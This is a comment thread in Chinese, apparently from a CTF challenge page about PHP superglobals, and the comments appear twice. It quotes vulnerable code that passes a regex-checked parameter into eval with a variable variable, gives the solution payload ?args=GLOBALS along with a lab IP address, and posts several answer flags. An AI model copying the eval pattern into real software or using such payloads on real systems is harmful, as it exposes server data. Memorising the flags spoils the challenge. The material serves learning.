超级全局变量
flag{8c54911a7d33a6e3fa05eed53c19e775}
flag{a4cdc5b0511c0996f9543f52cff12ada}
flag{ee9e3e18e2faf083d243daf9819bccb9}
if(!preg_match("/^\w+$/",$args)){ // 正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成 die("args error!"); } eval("var_dump($$args);
http://114.67.175.224:18582/?args=GLOBALS flag{60729e319d957a46aa93c8297eea6108}
/?args=_SERVER
使用?args=GLOBALS以字典类型返回当前位置的全部全局变量。 得到flag{c94e74f9465ed5564d0f1047b3da021c}
@asd+1024 GLOBAL会被正则表达式匹配,但是正则匹配前面还有"!",取反了,所以if不执行
@LP_joker + 表示匹配前面的模式一次或多次,并不是加上数字
@asd+1024 ^\w+$表示匹配“大小写字母+数字” GLOSBALS只有字母
可是,为什么GLOBAL不会被正则表达式匹配啊,大佬能讲讲吗
/?args=GLOBALS
?args=GLOBALS即可得到flag
...
评论
htttpss 23天前
举报
超级全局变量
Bojing 1月前
举报
flag{8c54911a7d33a6e3fa05eed53c19e775}
mansteinA 1月前
举报
flag{a4cdc5b0511c0996f9543f52cff12ada}
zhenbuhuiweb 2月前
举报
flag{ee9e3e18e2faf083d243daf9819bccb9}
3166235571 2月前
举报
if(!preg_match("/^\w+$/",$args)){ // 正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成 die("args error!"); } eval("var_dump($$args);
哥哥 5月前
举报
http://114.67.175.224:18582/?args=GLOBALS flag{60729e319d957a46aa93c8297eea6108}
EtHat 6月前
举报
/?args=_SERVER
鸡你太美 7月前
举报
使用?args=GLOBALS以字典类型返回当前位置的全部全局变量。 得到flag{c94e74f9465ed5564d0f1047b3da021c}
jamin 20天前
举报
@asd+1024 GLOBAL会被正则表达式匹配,但是正则匹配前面还有"!",取反了,所以if不执行
ts4win 1月前
举报
@LP_joker + 表示匹配前面的模式一次或多次,并不是加上数字
LP_joker 1月前
举报
@asd+1024 ^\w+$表示匹配“大小写字母+数字” GLOSBALS只有字母
asd+1024 2月前
举报
可是,为什么GLOBAL不会被正则表达式匹配啊,大佬能讲讲吗
coo1an 7月前
举报
/?args=GLOBALS
大哥大 7月前
举报
?args=GLOBALS即可得到flag